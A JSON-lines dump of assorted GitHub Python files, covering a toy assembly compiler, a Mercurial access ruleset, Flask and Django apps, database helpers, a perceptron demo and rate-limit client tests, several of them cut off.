# this means it is a 2-arg operation, var[0] = arg1, var[1] = operator, var[2] = arg2\n operator: str = vars[1]\n temp_counter: int\n # Process first 2 lines of ymc\n temp_ymc, temp_counter = cf.ymc_arithemtic_movs(vars, variables, False)\n counter += temp_counter # Increment program counter by number of bytes calculated in ymc_arithemtic_movs function\n\n # Parse operators and process third line of ymc\n temp_ymc += cf.ymc_operation_2args(operator, isSigned)\n counter += 2 # All 2 arg arithmetic operations are 2 bytes\n\n # Process fourth and final line of ymc\n temp_ymc += \"movmr \" + str(variables[assignment]) + \", eax\\n\" \n counter += 4 # movmr is 4 bytes, so we increment the program_counter by 4\n\n # Set modified registers and ymc\n pline_instance.set_register(\"EAX\")\n pline_instance.set_register(\"EBX\")\n pline_instance.set_YMC(temp_ymc)\n\n # Handle 3-arg arithmetic\n elif len(vars) == 5: # this means it is 3-arg operation\n operators: list[str] = [vars[1], vars[3]]\n # Process first 3 lines of ymc\n temp_ymc, temp_counter = cf.ymc_arithemtic_movs(vars, variables, True)\n counter += temp_counter # Increment program counter by number of bytes calculated in ymc_arithemtic_movs function\n\n # Parse operators and process fourth line of ymc\n temp_ymc += cf.ymc_operation_3args(operators, isSigned)\n counter += 3 # All 3 arg arithmetic operations are 3 bytes\n\n # Process fifth and final line of ymc\n temp_ymc += \"movmr \" + str(variables[assignment]) + \", eax\\n\" \n counter += 4 # movmr is 4 bytes, so we increment the program_counter by 4\n\n # Set modified registers and ymc\n pline_instance.set_register(\"EAX\")\n pline_instance.set_register(\"EBX\")\n pline_instance.set_register(\"ECX\")\n pline_instance.set_YMC(temp_ymc)\n \n print(\"Arithmetic line processed\") \n return counter\n\ndef relational(pline_instance: PLine) -> int: # if/else and while statements, start by checking what each line is\n line_text: str = pline_instance.text # grab text from line\n line_list: list[str] = line_text.split() # split line into list.\n type: str = line_list[0] \n counter = 0\n\n if type == \"if\" or type == \"while\": # check if line is if/else statement or while loop \n first_operand: str = line_list[1]\n sign: str = line_list[2]\n limit = line_list[3] \n if str(first_operand) in variables: # check if first operand is a variable\n pline_instance.append_YMC(\"movrm eax, \" + str(variables[first_operand])) # ADD YMC Instruction\n counter += 4 # ADD 4 bytes for movrm\n else:\n pline_instance.append_YMC(\"movrl eax, \" + limit) # ADD YMC Instruction\n counter += 3 # ADD 3 bytes for movrl\n\n if str(limit) in variables: # check if second operand is a variable\n pline_instance.append_YMC(\"movrm ecx, \" + str(variables[limit])) # ADD YMC Instruction\n counter += 4 # ADD 4 bytes for movrm\n else:\n pline_instance.append_YMC(\"movrl ecx, \" + limit) # ADD YMC Instruction\n counter += 3 # ADD 3 bytes for movrl\n\n pline_instance.append_YMC(\"cmprr eax, ecx\")\n counter += 2 # ADD 2 bytes for cmprr\n pline_instance.set_register(\"EAX\") # set registers EAX and ECX\n pline_instance.set_register(\"ECX\")\n\n if sign == '==':\n pline_instance.add_YMC(\"jne\")\n elif sign == '!=': \n pline_instance.add_YMC(\"je\")\n elif sign == '<': \n pline_instance.add_YMC(\"jge\")\n elif sign == '<=': \n pline_instance.add_YMC(\"jg\")\n elif sign == '>': \n pline_instance.add_YMC(\"jle\")\n elif sign == '>=': \n pline_instance.add_YMC(\"jl\")\n \n counter += 3 # ADD 3 bytes to counter for jump\n else:\n pline_instance.set_YMC(\"\")\n\n print(\"Relational line processed\") \n return counter\n\n####################################\n# Print\n# Brad K\n####################################\n\ndef printD(pline_instance: PLine) -> int: # print statements\n line_text: str = pline_instance.text # grab text from line\n statement: list[str] = line_text.split() # split line into list.\n arg: str = statement[1] # set arg to second item in split_line list\n unsigned: list[str] = [\"a\",\"b\",\"c\"] # declare signed and unsigned lists for if statements below\n signed: list[str] = [\"x\",\"y\",\"z\"]\n counter: int = 0\n\n\n if arg == \"\\\\n\": # check if new line\n pline_instance.set_YMC(\"outnl\\n\") \n counter += 1 # Increase program counter by 1 (outnl [1 byte])\n return counter\n if arg in variables: # Check if arg is in variables (It won't be if it's literal)\n arg_location: str = str(variables[arg]) # set location of arg to value in dictionary and convert to string\n if arg in unsigned: # else if arg is an unsigned variable\n pline_instance.set_YMC(\"movrm eax, \" + arg_location + \"\\n\") # set YMC instruction to first move arg_location to register eax, then outs eax \n pline_instance.append_YMC(\"outu eax\")\n counter += 6 # Increase program counter by 4 bytes (movrm) + 2 bytes (outs)\n elif arg in signed: # else if arg is a signed variable\n pline_instance.set_YMC(\"movrm eax, \" + arg_location + \"\\n\") # same as unsigned but with 'outu eax'\n pline_instance.append_YMC(\"outs eax\")\n counter += 6 # Increase program counter by 4 bytes (movrm) + 2 bytes (outu)\n elif arg.startswith('-'): # check if literal is negative\n pline_instance.set_YMC(\"movrl eax, \" + arg + \"\\n\") # set YMC instruction to move literal arg to register eax\n pline_instance.append_YMC(\"outs eax\") # append YMC instruction to outs eax\n counter += 5 # Increase program counter by 3 bytes (movrl) + 2 bytes (outu)\n else: # else it is positive\n pline_instance.set_YMC(\"movrl eax, \" + arg + \"\\n\") # set YMC instruction to move literal arg to register eax\n pline_instance.append_YMC(\"outu eax\") # append YMC instruction to outu eax\n counter += 5 # Increase program counter by 3 bytes (movrl) + 2 bytes (outu)\n\n # Set modified registers\n pline_instance.set_register(\"EAX\")\n\n print(\"Print line processed\") \n return counter\n\ndef halt(pline_instance: PLine) -> int:\n pline_instance.set_YMC(\"hlt\")\n return 1\n\ndef default_case(pline_instance: PLine) -> int:\n print(\"Default case processed. Something went very wrong\") \n return 0 \n\n# Switch dictionary to call functions\nswitch_dict = {\n 1: declaration,\n 2: arithmetic,\n 3: relational,\n 4: printD,\n 5: halt\n}","repo_name":"jarum3/G2YMC","sub_path":"src/ymc/helpers/compiler_extension.py","file_name":"compiler_extension.py","file_ext":"py","file_size_in_byte":10435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33954674951","text":"\"\"\"\nGlob-based, order-based rules matcher that can answer \"maybe\"\nwhere the inputs make clear that something is unknown.\n\"\"\"\n\nimport sys\nimport re\nimport os\nimport os.path\n\ndef globmatcher(pattern):\n p = \"[^/]*\".join(re.escape(c) for c in pattern.split(\"*\"))\n # ** means \"match recursively\" ie \"ignore directories\"\n return re.compile(p.replace(\"[^/]*[^/]*\", \".*\") + \"$\")\n\n# Returns 1 for a definite match\n# -1 for a definite non-match\n# 0 where we can't be sure because a key is None\ndef rmatch(k, m, kw):\n if k not in kw:\n return -1\n kkw = kw[k]\n if kkw is None:\n return 0\n elif m.match(kkw) is None:\n return -1\n else:\n return 1\n\ndef rule(pairs):\n matchers = [(k, globmatcher(v)) for k, v in pairs]\n def c(kw):\n return min(rmatch(k, m, kw) for k, m in matchers)\n c.patterns = [(k, m.pattern) for k, m in matchers]\n return c\n\nclass Ruleset(object):\n '''Class representing the rules in a rule file'''\n\n levels = [\"init\", \"publish\", \"write\", \"read\", \"deny\"]\n\n def __init__(self):\n self.rules = []\n self.preset = {}\n\n def set(self, **kw):\n self.preset.update(kw)\n\n def get(self, k):\n return self.preset.get(k, None)\n\n def allow(self, level, **kw):\n levelindex = self.levels.index(level)\n d = self.preset.copy()\n d.update(kw)\n for a, c in self.rules:\n m = c(d)\n if m == 1:\n # Definite match - what it says goes\n return a <= levelindex\n elif m == 0:\n # \"Maybe match\" - allow if it says yes, ignore if no\n if a <= levelindex:\n return True\n return False\n\n def readfile(self, fn):\n f = open(fn)\n try:\n self.buildrules(f)\n finally:\n f.close()\n\n def buildrules(self, f):\n \"\"\"Build rules from f\n\n f shoud be iterable per line, each line is like:\n\n level [user=pattern] [repo=pattern] [file=pattern] [branch=pattern]\n \"\"\"\n for l in f:\n l = l.strip()\n if not l or l.startswith(\"#\"):\n continue\n l = l.split()\n # Unrecognized actions are off the high end\n if l[0] in self.levels:\n ix = self.levels.index(l[0])\n else:\n ix = len(self.levels)\n self.rules.append((ix,\n rule([c.split(\"=\", 1) for c in l[1:]])))\n\nrules = Ruleset()\n","repo_name":"darksimpson/mercurial-server","sub_path":"ms/src/mercurialserver/ruleset.py","file_name":"ruleset.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"19216232109","text":"from flask import Flask, request\nimport tries_Harshil \nfrom tries_Harshil import Trie\nfrom tries_Harshil import TrieNode\nimport autocomplete2\nfrom autocomplete2 import helpers\nimport json\nfrom gensim.models import Word2Vec\nfrom collections import Counter\napp = Flask(__name__)\nhuge_file = \"/Users/harshitg/github/autocomplete/autocomplete/everything_combined_single.txt\"\nhuge_list = []\nwith open(huge_file, \"r\") as f:\n for line in f:\n huge_list.extend(line.split())\nkeys = huge_list\ncounter = Counter(keys)\ntrie = Trie()\ntrie.formTrie(keys)\nmodel = Word2Vec.load(\"/Users/harshitg/github/autocomplete/autocomplete/word2vec_all_cb.model\")\nmodel_vectors = model.wv \n@app.route('/',methods = ['GET','POST'])\ndef print_suggestions():\n if request.method == 'POST':\n auto_suggestions = trie.printAutoSuggestions(request.get_json().get('item'),huge_list,10)\n if auto_suggestions == 0 or auto_suggestions == -1: \n auto_suggestions = [\"No term found with this prefix\\n\"]\n trie.insert(request.get_json().get('item'))\n huge_list.append(request.get_json().get('item'))\n semantic_suggestions_new = [] \n return json.dumps([auto_suggestions , semantic_suggestions_new])\n elif auto_suggestions[0] in model_vectors:\n semantic_suggestions = model.most_similar(positive= auto_suggestions[0], topn=10)\n semantic_suggestions_new = []\n for i in range(0,len(semantic_suggestions)):\n suggestion = semantic_suggestions[i][0]\n semantic_suggestions_new.append(suggestion)\n return json.dumps([auto_suggestions,semantic_suggestions_new])\n else:\n semantic_suggestions_new = []\n return json.dumps([auto_suggestions,semantic_suggestions_new])\n","repo_name":"hgu23/Autocomplete_shiny","sub_path":"Flask API stuff/app_single_word.py","file_name":"app_single_word.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38291498327","text":"fire_list = input().split(\"#\")\nwater = int(input())\n\ntotal_fire = 0\neffort = 0\nput_out_cells = []\n\nprint(\"Cells:\")\n\n\nfor fire in fire_list:\n args = fire.split(sep=\" = \")\n fire_type = args[0]\n fire_value = int(args[1])\n valid = False\n\n if water < fire_value:\n continue\n\n if fire_type == \"High\":\n if 81 <= fire_value <= 125:\n valid = True\n \n elif fire_type == \"Medium\":\n if 51 <= fire_value <= 80:\n valid = True\n \n elif fire_type == \"Low\":\n if 1 <= fire_value <= 50:\n valid = True\n \n","repo_name":"vkostoff/SoftUni_Python","sub_path":"Programming_Fundamentals/Lists_Basics_Exercise/seize_the_fire.py","file_name":"seize_the_fire.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14365486922","text":"def test_brands(client):\n \"\"\"\n GIVEN a Flask app\n WHEN the route '/brands/' is requested (GET)\n THEN check the response is valid\n \"\"\"\n response = client.get('/brands/')\n assert response.status_code == 200\n print(response.data)\n assert response.data","repo_name":"a-camarillo/flask-api","sub_path":"server/app/tests/functional/test_brands.py","file_name":"test_brands.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43829508744","text":"# -*- coding: utf-8 -*-\n__author__ = 'Jazz_Qi'\n\nimport pandas as pd\nimport numpy as np\nheader = 0\nindex_col = 0\n\npd_data = pd.read_excel(r\"D:\\py_projects\\ML\\data\\test.xlsx\",header=header,index_col=index_col)\n\ncolumns_info_list = []\nisNaN_columns_dict = dict(pd_data.isna().any(0)) # isnull与isna是一样的,前者都用后者\nfor i in pd_data.columns:\n columns_info_list.append([i,pd_data[i].dtype,isNaN_columns_dict[i]])\ndata_info = pd.DataFrame(columns_info_list,columns=('columns','dtype','NaN_column'))\n\n# 空行\nNaN_row_list = pd_data.index[pd_data.isna().any(1) == True].tolist()\n\n# 空列\nNaN_column_list = data_info['columns'][data_info['NaN_column']].tolist()\n\n# 有空列的空行\nNaN_rows_dict = {}\nfor i in NaN_column_list:\n NaN_rows_dict[i] = pd_data.index[pd_data[i].isna() == True].tolist()\n\n\nprint(data_info)\nprint(NaN_row_list)\nprint(NaN_column_list)\nprint(NaN_rows_dict)\n\n\n\n\n","repo_name":"opop741/ML","sub_path":"InputData/InputExcel.py","file_name":"InputExcel.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38473449841","text":"#Author:XYZ\n#Date:2020-09-24\nimport pandas as pd\nimport numpy as np\nfrom sklearn.datasets import load_iris\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import Perceptron\n\ndef load_data():\n iris = load_iris()\n df = pd.DataFrame(iris.data, columns=iris.feature_names)\n df['label'] = iris.target\n df.columns = ['sepal length', 'sepal width', 'petal length', 'petal width', 'label']\n # print(df)\n data = np.array(df.iloc[:100, [0, 1, -1]])\n return data\n\n\ndef main():\n data= load_data()\n X, y = data[:,:-1], data[:,-1]\n y = np.array([1 if i == 1 else -1 for i in y])\n\n clf = Perceptron(fit_intercept=False,max_iter=1000,tol=None, shuffle=False)\n clf.fit(X, y)\n print(clf.coef_, clf.intercept_)\n\n x_ponits = np.arange(4, 8)\n y_ = -(clf.coef_[0][0]*x_ponits + clf.intercept_)/clf.coef_[0][1]\n plt.plot(x_ponits, y_)\n\n plt.plot(data[:50, 0], data[:50, 1], 'bo', color='blue', label='0')\n plt.plot(data[50:100, 0], data[50:100, 1], 'bo', color='orange', label='1')\n plt.xlabel('sepal length')\n plt.ylabel('sepal width')\n plt.legend()\n\n\n\n\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n","repo_name":"tyousinu1984/machine_learning","sub_path":"Statistical_learning_theory/2.Perceptron/perceptron_by_sklearn.py","file_name":"perceptron_by_sklearn.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12988387236","text":"import pypyodbc\r\n\r\n\r\nclass SQL_server:\r\n\r\n \"\"\" Возвращает список, картёжей. Без разбора и всякой систематизации \"\"\"\r\n @staticmethod\r\n def read_all_data_from_bd(SQL_server_name, Table_name, *columns):\r\n\r\n if len(columns) == 1:\r\n columns = columns[0]\r\n\r\n string_columns = \"\"\r\n for i, column in enumerate(columns):\r\n if i != 0:\r\n string_columns += \", [\" + column.replace('[', '').replace(']', '') + \"]\"\r\n else:\r\n string_columns += \"[\" + column.replace('[', '').replace(']', '') + \"]\"\r\n\r\n SQL_query = \"SELECT \" + string_columns + \" FROM [VkBot_databaze].[dbo].[\" + Table_name + \"]\"\r\n connection = pypyodbc.connect(\r\n 'Driver={SQL Server};'\r\n 'Server=' + SQL_server_name + ';'\r\n 'Databaze=VkBot_databaze;'\r\n )\r\n cursor = connection.cursor()\r\n cursor.execute(SQL_query)\r\n return cursor.fetchall()\r\n\r\n \"\"\" Возвращает список словарей. Всё как и должно быть! Без мусора\"\"\"\r\n @staticmethod\r\n def read_dictionary_from_bd(SQL_server_name, Table_name, *columns_):\r\n\r\n if len(columns_) == 1:\r\n columns_ = columns_[0]\r\n\r\n destroy_bracket = lambda s: s.replace('[', '').replace(']', '')\r\n columns = tuple(map(destroy_bracket, columns_))\r\n\r\n pile = SQL_server.read_all_data_from_bd(SQL_server_name, Table_name, columns)\r\n tasks = []\r\n for pile_task in pile:\r\n task = dict()\r\n for i in range(len(pile_task)):\r\n task[columns[i]] = pile_task[i]\r\n tasks.append(task)\r\n return tasks\r\n\r\n\r\n\"\"\"\r\nSQL_server = \"LENOVO-G700\\SQLEXPRESS\"\r\ndata_baze = \"a\"\r\nconnection = pypyodbc.connect(\r\n 'Driver={SQL Server};'\r\n 'Server=' + SQL_server + ';'\r\n 'Databaze=' + data_baze + ';'\r\n)\r\ncursor = connection.cursor()\r\n\r\ncursor.execute(SQL_query)\r\nconnection.commit()\r\nconnection.close()\r\n\"\"\"\r\n","repo_name":"GlebAkunenko/VK-bot","sub_path":"SQL_server.py","file_name":"SQL_server.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25263185327","text":"import logging\n\nfrom django.shortcuts import get_object_or_404, Http404\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import Sum\n\nfrom cartapp.models import Cart\nfrom productapp.models import Product\n\nlogger = logging.getLogger('django_logger')\n\n\ndef get_cart_products_by_user(request):\n \"\"\" Возвращает список товаров в корзине пользователя\"\"\"\n\n return Cart.objects.filter(user=request.user).select_related('product')\n\n\ndef add_selected_product_in_cart(request, pk: int) -> None:\n \"\"\"Добавляет выбранный товар в корзину\"\"\"\n try:\n selected_product = get_object_or_404(Product, pk=pk)\n cart_item = Cart.objects.filter(user=request.user, product=selected_product).first()\n\n if not cart_item:\n cart_item = Cart(user=request.user, product=selected_product)\n\n cart_item.quantity += 1\n cart_item.save()\n except (TypeError, ValueError, Http404) as e:\n logger.error(e)\n\n\ndef remove_selected_product_from_cart(pk: int) -> None:\n \"\"\"Удаляет выбранный товар из корзины\"\"\"\n\n try:\n selected_product = get_object_or_404(Cart, pk=pk)\n selected_product.delete()\n except (ObjectDoesNotExist, Http404) as e:\n logger.error(e)\n\n\ndef change_product_quantity(request, pk: int, quantity: int) -> Cart:\n \"\"\"Изменяет количество выбранного товара в корзине\"\"\"\n try:\n product_quantity = int(quantity)\n cart_item = Cart.objects.get(product_id=pk)\n\n if product_quantity > 0:\n cart_item.quantity = quantity\n cart_item.save()\n else:\n cart_item.delete()\n\n return Cart.objects.filter(user=request.user).order_by('product__price')\n except (TypeError, ValueError, Http404, ObjectDoesNotExist) as e:\n logger.error(e)\n","repo_name":"Korwys/django-online-store","sub_path":"mainapp/cartapp/services/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22030518266","text":"from gubernator import ratelimit_pb2 as pb\n\nimport pytest\nimport subprocess\nimport os\nimport gubernator\n\n\n@pytest.fixture(scope='module')\ndef cluster():\n args = [\"/bin/sh\", \"-c\",\n \"go run ./cmd/gubernator-cluster/main.go\"]\n\n os.chdir(\"golang\")\n proc = subprocess.Popen(args, stdout=subprocess.PIPE)\n os.chdir(\"..\")\n\n while True:\n line = proc.stdout.readline()\n if b'Ready' in line:\n break\n yield proc\n proc.kill()\n\n\ndef test_health_check(cluster):\n client = gubernator.V1Client()\n resp = client.health_check()\n print(\"Health:\", resp)\n\n\ndef test_get_rate_limit(cluster):\n req = pb.Requests()\n rate_limit = req.requests.add()\n\n rate_limit.algorithm = pb.TOKEN_BUCKET\n rate_limit.duration = gubernator.SECOND * 2\n rate_limit.limit = 10\n rate_limit.namespace = 'test-ns'\n rate_limit.unique_key = 'domain-id-0001'\n rate_limit.hits = 1\n\n client = gubernator.V1Client()\n resp = client.GetRateLimits(req, timeout=0.5)\n print(\"RateLimit: {}\".format(resp))\n","repo_name":"mailgun/gubernator","sub_path":"python/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":943,"dataset":"github-code","pt":"72"} +{"seq_id":"23452804658","text":"\r\nfrom domino.core import log\r\nfrom discount.core import Finder\r\n\r\ndef group_table(page, cur, finder):\r\n table = page.table('product_groups', hole_update=True)\r\n table.column('Код')\r\n table.column('UID')\r\n table.column('Описание')\r\n cur.execute('''\r\n select \r\n rawtohex(C.id), \r\n C.name, \r\n G.name,\r\n C.code,\r\n DOMINO.DominoUIDToString(C.id)\r\n from \r\n db1_classif C, db1_classif G\r\n where \r\n C.name is not NULL and C.type=14745602 and C.pid = G.id\r\n order by G.name\r\n ''')\r\n for id, name, gname, code, uid in cur:\r\n if not finder.match(code, uid, name, gname):\r\n continue\r\n row = table.row(id)\r\n row.text(code)\r\n row.text(uid)\r\n row.text(f'{gname} :: {name}')\r\n\r\ndef find(page):\r\n page.application['navbar'](page)\r\n account_id = page.request.account_id()\r\n conn = page.application.account_database_connect(account_id)\r\n cur = conn.cursor()\r\n finder = Finder(page)\r\n group_table(page, cur, finder)\r\n conn.close()\r\n\r\ndef open(page):\r\n page.application['navbar'](page)\r\n account_id = page.request.account_id()\r\n finder = Finder(page)\r\n page.title('Товарные группы')\r\n toolbar = page.table('toolbar', css='table-borderless').row()\r\n finder.append(toolbar)\r\n \r\n #finder.input(name='toolbar')\r\n #finder.button().glif('search').on_click('.find', forms=[finder]).secondary()\r\n \r\n conn = page.application.account_database_connect(account_id)\r\n cur = conn.cursor()\r\n group_table(page, cur, finder)\r\n conn.close()\r\n","repo_name":"polikashechkin/discount","sub_path":"python/pages/product_groups.py","file_name":"product_groups.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33163088465","text":"import psycopg2\r\nimport config\r\nimport requests\r\n\r\n\r\ndef connect():\r\n db = psycopg2.connect(dbname=config.dbname, host=config.host,\r\n port=config.port, user=config.user, password=config.passwd)\r\n return db\r\n\r\n\r\n\r\ndef selectAllUsers():\r\n db = connect()\r\n cur = db.cursor()\r\n try:\r\n cur.execute('SELECT * from public.\"user\";')\r\n except:\r\n print(\"I can't SELECT from user\")\r\n\r\n rows = cur.fetchall()\r\n return(rows)\r\n\r\ndef selectActivity(chat_id):\r\n db = connect()\r\n cur = db.cursor()\r\n rows = []\r\n try:\r\n cur.execute(\"\"\"\r\n SELECT * FROM public.user_activity\r\n WHERE user_id = %s;\r\n \"\"\",\r\n (str(chat_id),))\r\n rows = cur.fetchall()\r\n except:\r\n print(\"I can't SELECT into user_event\")\r\n\r\n return (rows)\r\n\r\n\r\ndef addUser(chat_id):\r\n db = connect()\r\n cur = db.cursor()\r\n try:\r\n cur.execute(\"\"\"\r\n INSERT INTO public.user(id) \r\n VALUES (%s);\r\n \"\"\",\r\n (chat_id))\r\n print('DONE')\r\n db.commit()\r\n except:\r\n print(\"I can't SELECT from user\")\r\n\r\n\r\ndef addCityToUser(user_id, city_id):\r\n db = connect()\r\n cur = db.cursor()\r\n try:\r\n cur.execute(\"\"\"\r\n INSERT INTO public.user_city(user_id, city_id) \r\n VALUES (%s, %s);\r\n \"\"\",\r\n (user_id, city_id))\r\n print('DONE')\r\n db.commit()\r\n except:\r\n print(\"I can't SELECT from user\")\r\n\r\n\r\ndef addEvent(dic):\r\n url = \"https://kudago.com/public-api/v1.2/event-categories/?lang=ru\"\r\n headers = {'Content-Type': 'application/json'}\r\n r = requests.get(url, '', headers=headers)\r\n dic = r.json()\r\n\r\n db = connect()\r\n cur = db.cursor()\r\n for d in dic:\r\n try:\r\n cur.execute(\"\"\"\r\n INSERT INTO public.event(event_id, event_name) \r\n VALUES (%s, %s);\r\n \"\"\",\r\n (d['slug'], d['name']))\r\n print('DONE')\r\n db.commit()\r\n except:\r\n print(\"I can't INSERT into event\")\r\n\r\n\r\ndef addCountPercent(chat_id, count, usersEvents):\r\n db = connect()\r\n print('I\\'m here')\r\n cur = db.cursor()\r\n\r\n for d in usersEvents:\r\n print(chat_id, d, int((usersEvents[d] / count) * 5))\r\n try:\r\n cur.execute(\"\"\"\r\n INSERT INTO public.user_event(user_id, event_id, count) \r\n VALUES (%s, %s, %s);\r\n \"\"\",\r\n (str(chat_id), d, int((usersEvents[d] / count) * 5)))\r\n print('DONE')\r\n db.commit()\r\n except:\r\n db.rollback()\r\n print(\"I can't INSERT into user_event\")\r\n print(\"I try UPDATE user_event\")\r\n cur.execute(\"\"\"\r\n UPDATE public.user_event\r\n SET count = %s\r\n WHERE user_id = %s AND event_id = %s;\r\n \"\"\",\r\n (int((usersEvents[d] / count) * 5), str(chat_id), d))\r\n print('DONE')\r\n db.commit()\r\n\r\n\r\ndef addActivity(chat_id, UA):\r\n db = connect()\r\n\r\n cur = db.cursor()\r\n\r\n print('AAAAAAAAAAAAAAAAAAAAAAA', UA)\r\n\r\n usersActivity = { i: {'id' : UA[i]['id'], 'mark' : UA[i]['mark']} for i in UA if UA[i]['mark'] != 0}\r\n\r\n for d in usersActivity:\r\n print(chat_id, usersActivity[d]['id'], usersActivity[d]['mark'])\r\n try:\r\n cur.execute(\"\"\"\r\n INSERT INTO public.user_activity(user_id, act_id, mark) \r\n VALUES (%s, %s, %s);\r\n \"\"\",\r\n (str(chat_id), usersActivity[d]['id'], usersActivity[d]['mark']))\r\n print('DONE')\r\n db.commit()\r\n except:\r\n db.rollback()\r\n print(\"I can't INSERT into user_activity\")\r\n if(usersActivity[d]['mark'] != 0):\r\n print(\"I try UPDATE user_activity\")\r\n cur.execute(\"\"\"\r\n UPDATE public.user_activity\r\n SET mark = %s\r\n WHERE user_id = %s AND act_id = %s;\r\n \"\"\",\r\n (usersActivity[d]['mark'], str(chat_id), str(usersActivity[d]['id'])))\r\n print('DONE')\r\n db.commit()\r\n\r\ndef getEventMarkInfo(chat_id):\r\n db = connect()\r\n cur = db.cursor()\r\n rows = []\r\n try:\r\n cur.execute(\"\"\"\r\n SELECT * FROM public.user_event \r\n WHERE user_id = %s AND count!=0;\r\n \"\"\",\r\n (str(chat_id),))\r\n rows = cur.fetchall()\r\n except:\r\n print(\"I can't SELECT into user_event\")\r\n\r\n return(rows)\r\n\r\n\r\ndef getRecomendation(chat_id, simList):\r\n db = connect()\r\n cur = db.cursor()\r\n rows = []\r\n try:\r\n cur.execute(\"\"\"\r\n SELECT n1.act_id, avg(n1.mark)\r\n FROM (SELECT act_id, mark\r\n FROM public.user_activity\r\n WHERE user_id != %s AND user_id = ANY(%s)) n1\r\n GROUP BY n1.act_id\r\n HAVING avg(n1.mark) >= 2.5\r\n ORDER BY 2 DESC;\r\n \"\"\",\r\n (str(chat_id), simList))\r\n rows = cur.fetchall()\r\n except:\r\n print(\"I can't SELECT into user_event\")\r\n return(rows)","repo_name":"Veronika-Kuzyaeva/CIT-course-bot","sub_path":"db_src/db_reg.py","file_name":"db_reg.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73144480873","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom math import ceil\nimport re\nfrom smtplib import SMTPException\n\nfrom boards.models import Board, Reply\nfrom boards.table import BoardTable\nfrom core.utils import error_page\n\nfrom django.conf import settings\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.contrib.auth.models import User\nfrom django.core.mail import send_mail\nfrom django.core.signing import TimestampSigner\nfrom django.db.models import Q\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\nfrom django.utils.translation import ugettext as _\n\nfrom teams.table import TeamTable\n\nfrom .forms import RegistrationForm, SettingForm, UserInfoForm\nfrom .models import Profile, UserSession\n\n\n@login_required\ndef setting(request):\n \"\"\"Account setting\"\"\"\n if request.method == \"POST\":\n settingform = SettingForm(request.POST)\n if settingform.is_valid():\n setting = settingform.save(commit=False)\n request.user.profile.sense_client = setting.sense_client\n request.user.profile.sense_slot = setting.sense_slot\n request.user.profile.alarm_board = setting.alarm_board\n request.user.profile.alarm_reply = True\n request.user.profile.alarm_paper = setting.alarm_paper\n request.user.profile.alarm_team = setting.alarm_team\n request.user.profile.alarm_full = True\n if setting.alarm_interval < settings.MIN_ALARM_INTERVAL:\n request.user.profile.alarm_interval \\\n = settings.MIN_ALARM_INTERVAL\n elif setting.alarm_interval > settings.MAX_ALARM_INTERVAL:\n request.user.profile.alarm_interval \\\n = settings.MAX_ALARM_INTERVAL\n else:\n request.user.profile.alarm_interval = setting.alarm_interval\n request.user.profile.save()\n msg = _('Saved successfully.')\n else:\n msg = _('Form validation Failure')\n\n elif request.method == \"GET\":\n if request.user.is_authenticated:\n msg = \"\"\n settingform = SettingForm(instance=request.user.profile)\n else:\n return redirect('/')\n\n return render(\n request,\n \"accounts/setting.html\",\n {\n 'settingform': settingform,\n 'msg': msg,\n }\n )\n\n\n@login_required\ndef edit_user_info(request):\n \"\"\"Edit user information\"\"\"\n profile = get_object_or_404(Profile, pk=request.user.profile.id)\n if request.method == \"POST\":\n infoform = UserInfoForm(request.POST, request.FILES, instance=profile)\n if infoform.is_valid():\n error = False\n if settings.ENABLE_NICKNAME:\n nick = infoform.cleaned_data['first_name']\n if nick != request.user.first_name:\n if nick == '':\n request.user.first_name = ''\n else:\n q = Q(username__iexact=nick) \\\n | Q(first_name__iexact=nick)\n if User.objects.filter(q).exists() or \\\n len(nick) < settings.NICKNAME_MIN_LENGTH or \\\n len(nick) > settings.NICKNAME_MAX_LENGTH:\n msg = _('Please check nickname.')\n error = True\n else:\n request.user.first_name = nick\n\n email = infoform.cleaned_data['email']\n if not error and email != request.user.email:\n code = infoform.cleaned_data['code']\n signer = TimestampSigner()\n try:\n value = signer.unsign(\n code, max_age=settings.VERIFICATION_CODE_VALID)\n code_check = value == email\n\n if code_check:\n request.user.email = email\n else:\n msg = _('Verification failure. Please check verification code again.')\n error = True\n except:\n msg = _('Verification failure. Please check verification code again.')\n error = True\n\n if not error:\n msg = _('Saved successfully.')\n request.user.save()\n infoform.save()\n else:\n msg = _('Form validation Failure')\n elif request.method == \"GET\":\n if request.user.is_authenticated:\n msg = \"\"\n infoform = UserInfoForm(instance=profile)\n else:\n return redirect('/')\n\n return render(\n request,\n \"accounts/edit_user_info.html\",\n {\n 'infoform': infoform,\n 'username': request.user.username,\n 